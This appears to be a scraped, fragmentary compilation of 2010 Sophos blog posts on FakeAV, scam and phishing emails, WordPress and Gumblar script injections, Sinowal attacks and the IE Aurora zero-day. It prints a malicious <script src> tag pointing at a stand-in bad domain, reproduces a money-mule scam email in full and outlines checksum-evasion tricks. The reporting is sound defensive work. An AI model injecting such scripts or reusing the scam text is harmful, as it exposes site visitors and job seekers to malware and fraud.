This is, as you will have guessed by now, not a genuine Windows security update, this is malware which redirects you from the Windows Security Center to the Fake AV interface and then presents you with false scan results that claim to have located malware on your machine. Rather a lot of malware as you can see from the picture below.

FakeAV malware employs a variety of tricks [1,2,3] and uses social engineering websites in oder to lure the innocent into its trap.

With the large revenue to be earned by the authors of such malware Sophos expects that more and more FakeAV trickery will be discovered in the near future.

It has been formatted nicely and appears to have come from a large job search website.

The message reads as follows:

Dear Job Seeker,

Upon reviewing your resume on Careerbuilder.com we have decided to offer you a job opportunity with our company. The job position is for a Payment Manager/Payments Processor in your area with no obligation to relocate.

Job strong-point: commissions without sales.

Job Type:

- Accounting - Finance
- Admin - Clerical
- Customer Service

Requirements:

- Proficiency at using Microsoft Office
- Possibility to check e-mail three times per day
- U.S. citizenship or permanent residence/green card
- Desired education level: High School
- Experience: no requirements
- Required travel: no
- Relocation: no

Benefits:

- Bonuses and commissions for each processed order
- No contact with our customers

Salary and commissions:

- Salary plus commissions: $85,000-$95,000 per year

- Employment type: full-time or part-time

Please contact us by replying to this e-mail if you are interested and we will provide more information.

HR Department

You might be tempted to try out your luck with such a generous offer, but before doing that, the lack of your name and absence of the hiring company’s name should arouse suspicion about this mail.

The Reply-To field in the mail header tells another story, that the sender is probably not from a well set-up business. Otherwise why would they send the email a main website address, but have you reply to an AOL account?

In fact, this is a typical example of money mule hiring scams that are constantly seen in spam messages.

Always think twice before responding when you are contacted by a potential employer, especially when there’s no mention of the name of the company that is actually interested.

The largest group of users at risk are Windows XP users running IE without Protected Mode enabled. Internet Explorer on Vista and Windows 7 has Protected Mode enabled by default.

Though no patch exists at this time, users can protect themselves by simply enabling Protected Mode in Internet Explorer.

You can find  more information on Microsoft Advisories and Bulletins at the SophosLabs vulnerability analysis page.

The image they’ve used is very sketchy too, patched together from other existing Apple products and bearing little resemblance to the pictures released so far.

However much you might want an iPad, don’t get lured in by spam like this.

Late last week, I noticed something of a surge in reports of a particular threat: hoards of legitimate pages were being injected with a malicious JavaScript, pro-actively blocked as Mal/ObfJS-H. Thus far, the common link between the affected sites appears to be Wordpress. One user report suggests that the malicious script is being added to the header.php template script used by Wordpress.

The injected script is visible immediately after the closing HEAD tag within affected sites:

Deobfuscating this script reveals its purpose.

The injected script writes a script element to the page to load an additional script from a remote site. Based on the content of that script, either additional content is loaded (document.write("<iframe ...) or a redirection performed (window.location=h).

The snapshot below shows the web traffic observed when browsing a compromised site on a test machine. The traffic to the rogue redirection site is highlighted. As you can see, a couple of simple HTTP 302 redirects are used to bounce traffic between sites.

• grey/black - traffic to the legitimate site
• red - initial request (/in.cgi?2) to the redirect site (loading the remote script)
• blue - second request (/in.cgi?3) from the added iframe. Server responds with HTTP 302 redirect.
• green - request to affiliate/payment site, due to 302 redirect. Query string passes in what appears to be the username (presumably for payment purposes). Server responds with HTTP 302.
• gold - third request to redirect site (/in.cgi?4), due to above 302 redirect.

The redirection and payment sites currently being used in this attack are both new - registered just last week. Both share the same administrative contact - an individual based in Saint-Petersburg (a quick search reveals something of a history for association with rogue domains).

Browsing to the root of the payment site reveals login links for the administrator and affiliates.

Looking through the HTTP headers from the payment site reveals a cookie being set, for the domain rich-traffic.com, storing the user name passed in the query string. Judging from the homepage, this site is clearly all about making money.

This crudely translates to:

Of course this is not the first time Wordpress users have been hit. Generally speaking, Content Management Systems (CMS) present attractive targets for attacks thanks to a large user base and relatively poor uptake of patches or updates. In this particular attack however, an out of date Wordpress installation does not appear to be the root cause - many of the sites I checked, appear to be running the latest available version (2.9.1 at time of writing).

It started innocently enough, as a post about getting a Free $25 Starbucks gift card for joining a particular group. The first person to join the group from my friends list happens to work for a non-profit organization helping young people. So, I expected the young people on his “friends list” to join this group shortly.

Looking at the page, my instincts tell me that something is amiss when the description (on the bottom left) says:

“This is not a scam, we are merely trying to get people to go to Starbucks. We are trying to see what coffee people purchase” (my emphasis added). The words “This is not a scam” rings loudly in my head. Isn’t the same phrase used in many Nigerian/419 scams? Usually, the only people who have to assure others that they’re not scamming are actual scammers.

Moving on to the “News” portion where the instructions are posted. It is a little horrifying to know that someone actually went through the steps below:

To paraphrase Step 4, it says: “Erase everything in your address bar, copy and paste the code below, and press enter”. Now, this is not just any url, it’s full-fledged javascript code. The code on the page did what it claim, which is “simply highlight all your friends for the ‘invitation’”. However, given the number of bad javascripts out there, such as the prevalent Troj/JSRedir-AR and Troj/JSRedir-AK, it is disconcerting to know that there are people out there willing to enter Javascripts of unknown origin in their browser. Imagine what would happen if the script starts installing a FakeAV or do other nasty deeds to their computer?

This comes to objective lesson #1 in this case:

As if running a Javascript is not bad enough, the group owner is not done yet! Step 6 asks the users to go to the “official site” and follow the instructions. The site happens to be like this:

The “last step” is to enter Personally Identifiable Information (PII) such as Name and Full Address. Some of my friends started to question the scheme by this time, yet others happily gave their info away, which gets us the objective lesson #2:

Now, what does the group/site owner have to gain from this scheme? By clicking submit, the PII is sent to a marketing company call cpalead, which we have seen before. The group/site owner gets a few cent every time someone gives up their personal information. So clearly the owner is profiting from this.

As for the poor users (and my poor friends) who submitted their information? They probably will never see a Starbucks card arriving in their mail. What’s more likely, however, is that their information will be sold off to the highest bidder for more “marketing” in the future.

Like Troj/JSRedir-AK, Troj/JSRedir-AR has two distinct forms:

• injected into HTML files as a malicious <SCRIPT> tag
• the other appended to JavaScript files

The Gumblar team appears to have replaced the Troj/JSRedir-AK infections with Troj/JSRedir-AR. Over the weekend Troj/JSRedir-AR was ~20% of infections to Troj/JSRedir-AK of ~8% (NB the JS/Sinowal-Gen at ~2%).

[From 2010-01-22 08:00:00 to 2010-01-26 10:00:00 PST (GMT-8)]

Interesting over at Unmask Parasites. Blog. they also noticed this change.

It looks like this month my colleagues and I will be playing cat and mouse with the Gumblar team.

… you get the best in rogue customer service as well.

Unsatisfied customers are invited to perpetuate their own victimization — by contacting the very same scammers who conned them in the first place! And if you give them your banking details as asked, I am confident you would have much more to worry about than the $49.95 wasted on your original poorly-made purchase.

[Graph shows malware hosted on websites from 2009-12-22 11:00:00 to 2010-01-21 11:00:00 (GMT-8)]

We saw 180,000 webpages that were infected with Troj/JSRedir-AK in the last 31 days. Translating that number into a more human comprehensible form means that we are seeing one new webpage infected with this malware every 15 seconds.

The affected sites include a host of well-known names, including ones from the following industry sectors:

• Energy Companies
• Retail Companies
• Automobile Club
• Hotels

In earlier posts (1, 2) I talked a little about what Troj/JSRedir-AK does, and I will expand on that a little below.

Using the JavaScript .replace the malware deobfuscates itself and dynamically writes an iFrame in order to point to a Russian website on port 8080 which serves up scripts detected by Sophos as Troj/Iframe-DL.

This new script will write an iFrame that will attempt to load a malicious PDF (detected as Troj/PDFJs-FY) and a file claiming to be a JPG image (detected as Exp/VidCtl-A). These then will install various other malware onto your computer.

Troj/JSRedir-AK is a continuation of the Gumblar gang’s exploits using Russian domains instead of Chinese ones.

In fact, the graph above is very similar to the one we saw for Troj/JSRedir-R and the infection mechanisms seem to be the same (i.e. FTP credentials).

In fact, I must be the luckiest person in the world since spammers like to send all kinds of lucky spam to me.

These days, I get inundated with lucky spam. The last spam I had, I got offered a free gift card if I purchased some Viagra from them. Wow.

On other days, asking me to lose my weight results in instant chances of winning a lottery at the same time and all of this is due to my lucky email address.

But before I can get my lucky email address, they first need to verify my hotmail account.

Not a problem, right?

Not so fast, Speedy Gonzales. A quick observation by moving my mouse over the displayed link shows that the real link is in fact different from that which is being shown.

Although the login page looks the same as a Window Live page, I don’t think Microsoft is that broke to host its website under another user’s /albums/userpics/ hotmail-au/ web address folder.

Obviously, this is a password phishing spam that specifically targets Hotmail, which is similar to the Hotmail Password Scam Continuing phishing campaign we reported a while back.

So, I strongly advise customers to be careful of this kind of phishing emails when clicking links in emails and using web-based email services.

Remember, you may be still not be lucky as me, but at least you won’t get your hotmail account compromised.

Good Luck :)

Finally, and perhaps most worryingly, this type of advice feeds the “right now we have a problem, but as soon as the patch is available, we can relax” school of thought. Will the online world be significantly safer once this patch is available and widely deployed? Generally speaking, probably not.

The questions I received confirmed to me that this school of thought definitely exists. In this post, I will highlight one of the ongoing threats that justifies my statement - Sinowal (aka Mebroot) attacks.

I have posted several times before about Sinowal, highlighting:

• its use of the date in the algorithm to generate the domain to which compromised web pages will redirect.
• its use of Twitter trends JSON data as part of that algorithm.
• its use of complex PDF documents as part of the exploit kit to infect users with the payload(s).

The flow of a recent Sinowal attack is illustrated below (the identity of the legitimate, compromised .co.uk site is masked):

As you can see, the steps are:

• connect to the legitimate site, retrieving page and all other required content (including the regular Google Analytics scripts as the last item).
• connection to Twitter daily trends data. This request is driven from the Sinowal script injected into the page (blocked as JS/Sinowal-Gen and Mal/ObfJS-AG).
• connection to the attack site (Neosploit kit I believe). The malicious script is blocked by Sophos products as Mal/ObfJS-CM.
• the script loads a second script fragment, before finally loading a malicious PDF document (blocked as Troj/PDFJs-GE), as described previously.
• not included in this capture (Adobe Reader simply returned an error message) is the payload. If the Adobe exploit is successful, the payload is downloaded from the attack site.

Historically, the payload for Sinowal attacks was just Sinowal, but as noted previously, recently other payloads are being distributed in this way (including fake AV and Zbot).

I was curious to take a look at the distribution of the sites getting hit with Sinowal, given the historical European (in fact, Italian) bias. We continue to see large numbers of legitimate sites getting compromised with the malicious redirector scripts (Mal/ObfJS-AG or JS/Sinowal-Gen).

Looking at the data for Jan 1st-21st 2010, it is clear that hosting providers across the globe are getting hit:

In Europe there is still a strong grouping within Italy:

And for completeness, the distribution across North America and Canada:

Update: SophosLabs can confirm that the website has now been cleaned up.

In August last year, SophosLabs first noticed that a Sophos customer was blocked from visiting a page on the KitchenAid website due to a detection of Mal/Badsrc-C.

Over the last six months I and several of my colleagues have been trying to talk to contacts at KitchenAid and Whirlpool to inform them of the issue and offer assistance. We have consistently hit brick walls.

When I initiate a crawl of the KitchenAid site the crawler returns the following results

4 instances of Mal/Badsrc-C found
hxxp:/XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp:/XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp:/XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp:/XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N

The X’s representing letters and the N’s representing numbers in the above.

Whenever, I talk to customers and people in IT and I tell them we find legitimate websites compromised by malicious code, their natural response is to say ‘Do you contact them?’

To which I reply, ‘We try but …’

• Emailing the address in the WHOIS records gets nowhere because it is either wrong, goes nowhere or messages are not read.
• Emailing contact details on the websites suffers the same problems.
• Phoning up to find the IT department is difficult.
• Once you have found the IT department finding someone who either understands or cares is time consuming.

Some of the responses we do get back are so negative that we wonder why we bother.

The particular sites infected have multiple copies of a

<script src=http://bad-domain.com/b.js>

on the pages and even though the site they point to is currently dead there is no guarantee that it will stay that way.

So why is the KitchenAid site still infected?

If you have any comments or answers then contact this blog via sophosblog@sophos.com.

Malware authors are just like salesmen. They cross-sell as well. A fake AV tried to do the same to me. Besides offering great AV protection, it wants me to get some useful codecs so that I can watch all my legit DVDrips. Thus, someone decided that in order to get me to install their codecs, he/she will have to terminate all processes related to media players.

Terminating Media Players

In addition to the above, the malware also terminates different kinds of common applications because I need to update my AntiVirus to get them to work.

Update My AV Please

Eventually, I ended up with a useless machine that will not play my movies nor launch common applications. Cross selling is bad for computer users! Using Whois, I have confirmed that one russian salesman named ‘Alexey’, has been behind all these. Sophos has put an end to his nonsense by blocking his websites and detecting his crap malware as Mal/FakeAV-BT.

Instead, why don’t you apply the out-of-band patch ( MS10-002 ) that Microsoft has just released…?!!!

Patching remote-code-execution vulnerabilities is usually “a good idea” to say the least.  But, considering that:

Microsoft rushed to get this patch out…… ( Thank you Microsoft! )

And that, this patch addresses several Internet Explorer vulnerabilities - of which includes CVE-2010-0249 - the infamous “Aurora attacks” related vulnerability that’s well known to be making the rounds in the wild.

Annnnd that, the Metasploit framework has released an update that can generate attacks based on this….. Which means that every script-kiddy / pentester / disgruntled-monkey-with-a-laptop can mount their own little mini operation Aurora-like attacks.

Annnnnnd that, Microsoft has posted an advisory about an unpatched elevation of privilege attack that affects most Windows NT platforms ( from Windows NT 3.1 to, and including, Windows 7 ) - which there is proof-of-concept code now publicly available for…..

One, probably ought to apply this patch as soon as possible.

For more information on the recent Microsoft Security Update or Advisory, see the latest SophosLabs vulnerability analysis here.

Messages have the subject “IMPORTANT: Your iPhone Warranty Extension for 1 Year!”, pretend to be sent from “iphonewarranty@apple.com”, and look as follows (click to enlarge the image):

Recipients who feel like they can’t let this limited-time too-good-to-be-true special offer pass them by will find themselves redirected to the following page:

All you have to do is enter your phone’s serial number and IMEI number, as well as its type and capacity, and you’ll be all set. Don’t know how to get any of these numbers? Not to worry, there’s a link to help you find them … which has the cheek to point to a real Apple support page. In fact all the links on this page point you to the real Apple website - this is partly to allay suspicion, but also simply because it’s easier for the authors to copy an area of the real site than to be selective or creative.

Entering your credentials (no, I didn’t give them any real ones) takes you to this page:

Interestingly they don’t ask for some fairly basic information here - at no point do they want either your name or your phone number. There’s still a range of nefarious activities they could get up to though - one that springs to mind is that IMEI numbers are used by network providers to block connections from phones registered as stolen, so by harvesting details from live phones criminals might be able to launder stolen phones.

Whatever they plan to do with your iPhone details, it’s not going to be good. You’re enticed in with a warranty, but the only thing you’re going to get is ripped off.

Microsoft’s announcement :
http://www.microsoft.com/technet/security/bulletin/ms10-jan.mspx

Although the initial exploits seen in the wild for this vulnerability target IE 6 and Windows XP, security researchers (and cybercriminals too) have been hard at work extending the reach of the exploits to newer versions of both IE and Windows.

As with any security patch, our advice is to apply it as soon as you can.

Though numbers are still very low, over the past 24 hours or so we have seen a few sites serving up malicious code attempting exploit the vulnerability. Sophos products are blocking the content as Troj/ExpJS-N.

For the sites that are still active, the payloads are another Mal/PcClient variant being blocked as Mal/Generic-A, and a downloader Trojan being pro-actively detected as Mal/BredoPk-B.

SophosLabs will continue monitoring the situation, but as previously described, take this opportunity to review your general approach to web security and ensure your security product is correctly configured to take full advantage of the buffer overflow and runtime protection provided in the Sophos endpoint product. And as Chet noted yesterday, stay alert for the patch which Microsoft have announced they will release ahead of the regular monthly cycle.

Particularly strong warnings have been sent within Germany and France, with web users urged to use alternative browsers until a patch is made available.

Personally, I find such actions a little surprising, and though they may be well intentioned, they are not necessarily helpful. Or perhaps not as helpful as they could be. I am all for raising user awareness and alerting individuals to the malicious threats that are out there - user education is something to be encouraged. But advising “a change in browser” actually does a poor job of educating people about the real web threat that is out there.

For starters, all browsers suffer from vulnerabilities. CVE-2010-0249 is what we are talking about at the moment, but other browsers are targeted. As far a user’s browser goes, the important thing is to avoid using legacy versions and ensure that it is fully patched.

The advice also gives the impression that the web threat starts and stops with the browser. Actually, many other applications that the browser may interact with may be targeted by attackers (browser plug-ins, extensions and the like). A topical example currently would be (the ubiquitous) Adobe Reader, which has been somewhat hammered by malware throughout 2009, as readers of our blog will be aware [3,4].

Finally, and perhaps most worryingly, this type of advice feeds the “right now we have a problem, but as soon as the patch is available, we can relax” school of thought. Will the online world be significantly safer once this patch is available and widely deployed? Generally speaking, probably not.

In my opinion it is better to take this opportunity:

• to educate users about web threats as a whole. In just a few weeks it is Safer Internet Day 2010. The publicity that this exploit is generating could be used to encourage users and organizations to participate in the event and learn about safe computing.
• to review the browser(s) being used in an organization (i.e. not the knee-jerk reaction of simply switching). This exploit could be the driving force for organizations using IE to upgrade to IE 8 (or, if IE7, ensure that DEP is enabled).
• to review the configuration of the security products being used. Are all relevant features actually enabled and configured correctly? For example, the BOPs and HIPs (see below) technologies included in the Sophos endpoint product are configured to run in “alert only” mode by default (reporting but not blocking events).

As detailed in the previous blog posting, and within the vulnerability assessment page, Sophos protects users against malicious code attempting to exploit this vulnerability in a variety of ways:

Buffer overflow protection (BOPs). The BOPs technology included in the SAV endpoint product provides generic protection against malicious web pages attempting to exploit this vulnerability.

Script detection. Detection for the malicious scripts used in web pages to exploit this vulnerability has been added as Troj/ExpJS-N. Pro-active detection of some malicious scripts seen is already provided with Mal/JSShell-B.

Payload detection. The payload of the publicized attacks is a variant within a large and well established family of remote access Trojans, known as ‘PcClient’. Detection for the specific variants involved has been provided as Troj/Spy-EY, and the Mal/PcClient-I generic has been updated for additional protection against future variants.

On top of this, the runtime protection offered by HIPs provides a significant boost in protection against the payloads that this and future attacks attempt to infect users with. Of course, filtering web traffic to block access to known malicious, high risk or low reputation sites significantly increases the protection of users against all malicious web attacks (irrespective of browser choice!).

Update: Microsoft have announced that they will make a patch available for this ahead of the scheduled patch Tuesday in February. In the meantime, there is a need for careful and considered strategies in mitigating attacks, and not knee-jerk reactions.

When they recognise their creations have been blocked by a particular anti-virus, they resort to finding ways around it so that their new creations would slip through the detection.

To stay ahead of the malware race is the first and foremost priority of a virus analyst. And when it comes to creating anti-virus signatures, it is important to known when and where not to write a checksum detection on the file.

Fake anti-virus malware are particularly notorious in this respect.

What this group of malware authors do is write a simple application to foil automated checksums. Some of these applications are simple in some respects.

Take for example, the following 2 pieces of malware. Looking at their resources, it would appear at first sight that the icons of both pieces of malware are one and the same.

However, if a virus analyst was to write a detection based on checkumming on the icon resource itself in the hope that it would detect both pieces of malware, that would be a mistake. There are subtle differences between the 2 icons which prevents an analyst from simply writing a checkum detection based on their icon information (highlighted in red below).

What the difference here in this case is the palette information. Here, the icons are in 8 bit format which means that their header information utilise a RGB color palette (made up of RGBQUAD structures), which also includes information for 2 bitmap masks (an AND and a XOR mask). Through subtle changes in the RGB color palette information, it is possible to easily and quickly generate 2 separate pieces of such malware.

These kind of sleight of hand techniques are specifically designed to foil anti-virus applications which resort to automated data checksumming when they are essentially still using the same piece of code.

There are of course, more complex examples and tricks these malware authors use and this is only the tip of the iceberg, so to speak. For example, other sleight of hand techniques including manipulating the RGB information by a single value for 1 channel.

Virus analysts these days have to be alert and to know what works and what doesn’t when it comes to attempting to wipe a family of malware with a single anti-virus signature and all of these information and knowledge constitute part of the arsenal that virus analysts use every day in the ongoing effort to fight malware.

It was clear that the recently patched Adobe Reader vulnerability described in APSB10-02 was the prime candidate for the attack, since the vulnerability has not been patched when the attacks occurred in mid December. Recent examples of PDF exploits which are well documented in ISC handler’s diaries show just how complex the attacks can be.

However, when yesterday Microsoft security team released an advisory with the announcement of a new Internet Explorer zero day vulnerability it was clear that the this new vulnerability jumps to the first position in the chart of suspects. The latest vulnerability affects all commonly used versions of Internet Explorer, including IE6, IE7 and IE8. As always SophosLabs have also written a vulnerability analysis of the latest vulnerability and are working with Microsoft on the threat mitigation.

Regardless of which of the above exploits was used in the initial stage of the attack, it seems that a backdoor Trojan was used as a payload to allow for remote control of the attacker over compromised system. From information posted on several websites it seems that the backdoor Trojan used in the attack is a variant of PcClient backdoor which is an old and well known backdoor family. Samples of the family are detected by Sophos products as Mal/PcClient and Troj/Spy-EY.

Now that more information about the latest IE vulnerability is available we can expect a rush towards public proof of concept exploits which will soon after be included in various exploit toolkits. It seems that the guys from Microsoft Security Response team will be working overtime to release yet another out of band update for Internet Explorer. Let us hope they will be able to make it before exploits become widespread on malicious websites.